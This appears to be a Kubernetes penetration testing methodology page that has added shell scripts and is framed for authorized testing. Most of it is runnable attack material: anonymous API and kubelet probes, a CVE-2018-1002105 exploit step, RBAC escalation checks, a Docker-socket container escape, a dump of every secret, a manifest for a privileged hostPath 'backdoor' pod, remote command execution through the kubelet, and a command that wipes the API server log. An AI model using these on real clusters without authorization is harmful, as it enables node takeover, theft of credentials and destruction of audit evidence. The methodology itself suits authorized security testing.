Container Testing Methodology
Kubernetes/Container Penetration Testing Methodology
1. Reconnaissance
Gather information about the target environment
Identify exposed services and endpoints
Commands:
# Scan for open ports
nmap -sV -p- <target_ip>
# Identify the Kubernetes API server (/version is readable without credentials on default clusters via the system:public-info-viewer binding and returns the exact gitVersion)
curl -k https://<api_server_ip>:6443/version
# Enumerate subdomains
subfinder -d <domain>
2. Initial Access
Exploit exposed services
Gain a foothold in the cluster
Commands:
# Test for unauthenticated access to the API server. Point kubectl at an empty kubeconfig, otherwise it silently sends any credentials it finds.
# A listing means system:anonymous is bound to a role; 401 means --anonymous-auth=false; 403 means anonymous requests reach RBAC but are denied.
kubectl --kubeconfig=/dev/null --insecure-skip-tls-verify -s https://<api_server_ip>:6443 get pods
# Exploit known vulnerabilities. Compare the gitVersion from step 1 first: CVE-2018-1002105 (API server proxy request flaw) is fixed in 1.10.11, 1.11.5 and 1.12.3; the script name is a placeholder for whichever public PoC you use.
./cve-2018-1002105.sh https://<api_server_ip>:6443
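The recon and initial-access checks above, combined into one script. This is an added example, not code from the original page; it assumes curl is installed and that the API server host and port are supplied by the caller. The version compare is written out so it tolerates vendor suffixes such as +k3s1 or -gke.1, and the unauthenticated probe uses curl rather than kubectl because curl sends nothing unless told to.

```shell
#!/bin/sh
# Added example, not code from the original page: fingerprint a Kubernetes API
# server, check the version against the CVE-2018-1002105 fix releases, then
# probe for anonymous access. Assumes curl on PATH; host/port are hypothetical
# placeholders supplied by the caller.
set -u

# Numeric part of dotted field $2 of version $1 (missing field -> 0). Strips
# vendor suffixes such as "-gke.1" or "+k3s1".
_vfield() {
  _f=$(printf '%s\n' "$1" | cut -d. -f"$2" | sed 's/[^0-9].*//')
  printf '%s' "${_f:-0}"
}

# True (exit 0) when version $1 is strictly older than $2; a leading "v" is ignored.
version_lt() {
  _a=${1#v}; _b=${2#v}; _i=1
  while [ "$_i" -le 3 ]; do
    _p=$(_vfield "$_a" "$_i"); _q=$(_vfield "$_b" "$_i")
    [ "$_p" -lt "$_q" ] && return 0
    [ "$_p" -gt "$_q" ] && return 1
    _i=$((_i + 1))
  done
  return 1
}

# CVE-2018-1002105 (privilege escalation through API server proxied requests)
# was fixed in 1.10.11, 1.11.5 and 1.12.3; every older release, 1.9 and below
# included, is affected.
cve_2018_1002105_affected() {
  _v=${1#v}
  case "$(_vfield "$_v" 2)" in
    10) version_lt "$_v" 1.10.11 ;;
    11) version_lt "$_v" 1.11.5 ;;
    12) version_lt "$_v" 1.12.3 ;;
    *)  version_lt "$_v" 1.10.0 ;;   # <1.10 affected, >=1.13 fixed
  esac
}

# What the HTTP status of an unauthenticated request tells you.
classify_anon_access() {
  case "$1" in
    200) echo "anonymous access allowed (system:anonymous is bound to a role that reads this resource)" ;;
    401) echo "anonymous auth disabled (--anonymous-auth=false)" ;;
    403) echo "anonymous auth enabled but RBAC denies system:anonymous" ;;
    *)   echo "unexpected status $1" ;;
  esac
}

# Full probe: version endpoint, vulnerability range check, then an
# unauthenticated pod listing. curl deliberately sends no credentials.
probe_apiserver() {
  _host=$1; _port=${2:-6443}
  _base="https://$_host:$_port"
  _ver=$(curl -sk "$_base/version" | sed -n 's/.*"gitVersion": *"\([^"]*\)".*/\1/p')
  echo "gitVersion: ${_ver:-unknown}"
  if [ -n "$_ver" ] && cve_2018_1002105_affected "$_ver"; then
    echo "  affected by CVE-2018-1002105 (fixed in 1.10.11 / 1.11.5 / 1.12.3)"
  fi
  _code=$(curl -sk -o /dev/null -w '%{http_code}' "$_base/api/v1/pods")
  echo "GET /api/v1/pods -> $_code: $(classify_anon_access "$_code")"
}

# Usage: sh probe.sh <api_server_ip> [port]
if [ $# -gt 0 ]; then
  probe_apiserver "$@"
fi
```

A 403 on /api/v1/pods is still worth recording: it means anonymous requests reach the authorizer, so anything that is bound to system:anonymous or system:unauthenticated (by default only /version, /healthz, /livez and /readyz) is reachable without a token.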
3. Privilege Escalation
Escalate privileges within the cluster
Move laterally between pods/nodes
Commands:
# List service accounts and the bindings that grant them rights, across all namespaces
kubectl get serviceaccounts -A
kubectl get clusterrolebindings -o wide
kubectl get rolebindings -A -o wide
# What can the identity you hold do? Inside a pod, kubectl uses the mounted service account token automatically
kubectl auth can-i --list
# Exploit overly permissive RBAC rules. Impersonation (--as) only works if your current identity has the "impersonate" verb; otherwise authenticate with the target account's own token
kubectl --as=system:serviceaccount:default:default get secrets
# Escape container to host. This only works if you can talk to the Docker daemon, e.g. /var/run/docker.sock mounted into the container; the Kubernetes equivalent is a privileged pod with the node root filesystem as a hostPath volume
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host
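The two checks a tester runs first from inside a compromised pod, as an added example that is not part of the original page: which of the well-known RBAC escalation paths the mounted token grants, and whether the container itself offers an escape (CAP_SYS_ADMIN in the effective capability set, a Docker socket, a service account token). It assumes kubectl is on PATH and reads the in-cluster token; the namespace and file paths are parameters so the checks can be pointed at copied files.

```shell
#!/bin/sh
# Added example (not from the original page): from inside a compromised pod,
# enumerate the escalation paths the mounted service account gives you, then
# check the usual container-escape preconditions. Assumes kubectl on PATH;
# the namespace and file paths are hypothetical placeholders.
set -u

# Verb/resource pairs that let a service account become cluster-admin or reach
# the node, with the reason each one matters.
ESCALATION_CHECKS='
create pods|schedule a privileged hostPath pod on a node
create pods/exec|exec into any pod in the namespace and take its token
get secrets|read every token and credential in the namespace
create clusterrolebindings|bind yourself to cluster-admin
create rolebindings|bind yourself to admin in the namespace
create serviceaccounts/token|mint tokens for more privileged accounts
impersonate users|act as any user, including cluster-admin
patch nodes|label or taint nodes to steer workloads
create daemonsets|run a pod on every node
'

# Ask the API what the current identity may do, one SelfSubjectAccessReview
# per check. "kubectl auth can-i" prints yes/no on stdout, which is what we
# key on (a shell function named kubectl can stand in for it when testing).
rbac_escalation_paths() {
  _ns=${1:-default}
  printf '%s\n' "$ESCALATION_CHECKS" | while IFS='|' read -r _check _why; do
    [ -z "$_check" ] && continue
    _verb=${_check%% *}; _res=${_check#* }
    _ans=$(kubectl auth can-i "$_verb" "$_res" -n "$_ns" 2>/dev/null)
    case "$_ans" in
      yes*) printf 'ESCALATION: %s %s (%s)\n' "$_verb" "$_res" "$_why" ;;
    esac
  done
}

# Bit 21 of the CapEff mask is CAP_SYS_ADMIN. A privileged container shows
# every bit set (e.g. 0000003fffffffff); the Docker default 00000000a80425fb
# does not include it.
has_cap_sys_admin() {
  [ -n "${1:-}" ] || return 1
  [ $(( 0x$1 >> 21 & 1 )) -eq 1 ]
}

# Report the classic escape preconditions. Returns 0 when at least one was found.
escape_preconditions() {   # [status_file] [docker_socket] [sa_token]
  _status=${1:-/proc/self/status}
  _sock=${2:-/var/run/docker.sock}
  _token=${3:-/var/run/secrets/kubernetes.io/serviceaccount/token}
  _found=0
  _caps=$(sed -n 's/^CapEff:[[:space:]]*//p' "$_status" 2>/dev/null)
  if [ -n "$_caps" ] && has_cap_sys_admin "$_caps"; then
    echo "CAP_SYS_ADMIN in effective set ($_caps): privileged or relaxed pod, try mounting the node's block device"
    _found=$((_found + 1))
  fi
  if [ -S "$_sock" ]; then
    echo "Docker socket at $_sock: docker -H unix://$_sock run -v /:/host -it ubuntu chroot /host"
    _found=$((_found + 1))
  fi
  if [ -r "$_token" ]; then
    echo "Service account token at $_token: run rbac_escalation_paths against the API server with it"
    _found=$((_found + 1))
  fi
  [ "$_found" -gt 0 ]
}

# Usage from inside a pod: sh check.sh [namespace]
if [ $# -gt 0 ]; then
  rbac_escalation_paths "$1"
  escape_preconditions
fi
```

The `-n` flag is passed for every check for simplicity; for the cluster-scoped resources in the list (nodes, clusterrolebindings) the answer you care about is the one without a namespace, so re-run those two with `kubectl auth can-i <verb> <resource>` and no `-n` before reporting them.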
4. Post-Exploitation
Access sensitive data
Maintain persistence
Pivot to other parts of the infrastructure
Commands:
# Access secrets across all namespaces (values are base64-encoded, not encrypted)
kubectl get secrets -A -o yaml
# Create a backdoor pod (typically privileged, hostPID/hostNetwork, with the node root filesystem mounted as a hostPath volume and pinned to a node)
kubectl apply -f malicious-pod.yaml
# Exploit the kubelet API for node access. A pod listing means anonymous requests are accepted; 401 means the kubelet has anonymous auth off, 403 means its Webhook authorizer denied the request
curl -k https://<node_ip>:10250/pods
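The kubelet probe and the backdoor pod from this step, written out as an added example that is not part of the original page. It assumes curl and kubectl are on PATH; the node IP, pod name, node name and the alpine image tag are placeholders. The kubelet's /run endpoint executes a command in a container on that node, which is why an open port 10250 is equivalent to root on the node.

```shell
#!/bin/sh
# Added example (not from the original page): probe a node's kubelet API and
# generate the privileged hostPath pod manifest the "backdoor pod" step needs.
# Node IP, pod/node names and the image tag are hypothetical placeholders;
# curl and kubectl are assumed to be on PATH.
set -u

# URL of the kubelet endpoint that runs a command inside a container.
kubelet_run_url() {   # node namespace pod container
  printf 'https://%s:10250/run/%s/%s/%s' "$1" "$2" "$3" "$4"
}

# Unauthenticated kubelet probe. /pods lists every pod the kubelet manages and
# /runningpods/ is the container runtime's view. 200 means anonymous requests
# are accepted; 401 means anonymous auth is disabled on the kubelet; 403 means
# the request reached its Webhook authorizer and was denied.
probe_kubelet() {   # node
  for _ep in /pods /runningpods/; do
    _code=$(curl -sk -o /dev/null -w '%{http_code}' "https://$1:10250$_ep")
    printf '%s -> %s\n' "$_ep" "$_code"
  done
}

# Run a command in a container through the kubelet (only useful after a 200).
kubelet_exec() {   # node namespace pod container cmd
  curl -sk -X POST "$(kubelet_run_url "$1" "$2" "$3" "$4")" -d "cmd=$5"
}

# Pod manifest: privileged, host PID and network namespaces, node root at
# /host, tolerating every taint and pinned to a node.
# Apply with: backdoor_pod_manifest <name> <node> | kubectl apply -f -
# then: kubectl -n kube-system exec -it <name> -- chroot /host
backdoor_pod_manifest() {   # name node [namespace]
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: $1
  namespace: ${3:-kube-system}
spec:
  nodeName: $2
  hostPID: true
  hostNetwork: true
  tolerations:
  - operator: Exists
  containers:
  - name: shell
    image: alpine:3.19
    command: ["/bin/sh", "-c", "while true; do sleep 3600; done"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
EOF
}

# Usage: sh kubelet.sh <node_ip>            (probe only)
#        sh kubelet.sh <node_ip> <pod_name> (probe, then print a manifest for that node)
if [ $# -gt 0 ]; then
  probe_kubelet "$1"
  [ $# -gt 1 ] && backdoor_pod_manifest "$2" "$1"
fi
```

Both halves leave obvious traces: the kubelet logs /run requests, and the pod is visible in kube-system to anyone who lists pods, so name it after the engagement and record it for cleanup in step 5.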
5. Covering Tracks
Remove evidence of intrusion, and above all the artifacts you created (pods, bindings, service accounts, tokens), so the cluster is left as you found it
Clean up temporary files and logs only where the rules of engagement explicitly cover anti-forensics; wiping logs destroys the evidence the defenders are paid to find and is normally out of scope
Commands:
# Delete pods
kubectl delete pod <compromised_pod>
# Clear logs. The path depends on the deployment: when kube-apiserver runs as a static pod its output lands under /var/log/pods or in journald, and API audit logs are written to a separate file set by --audit-log-path
echo > /var/log/kubernetes/kube-apiserver.log
6. Reporting
Document findings
Provide remediation recommendations
Key Areas to Address:
Misconfigurations
Vulnerabilities in images or components
Overly permissive RBAC rules
Insecure network policies
Lack of encryption or proper authentication
Remember to always get proper authorization before performing any penetration testing activities.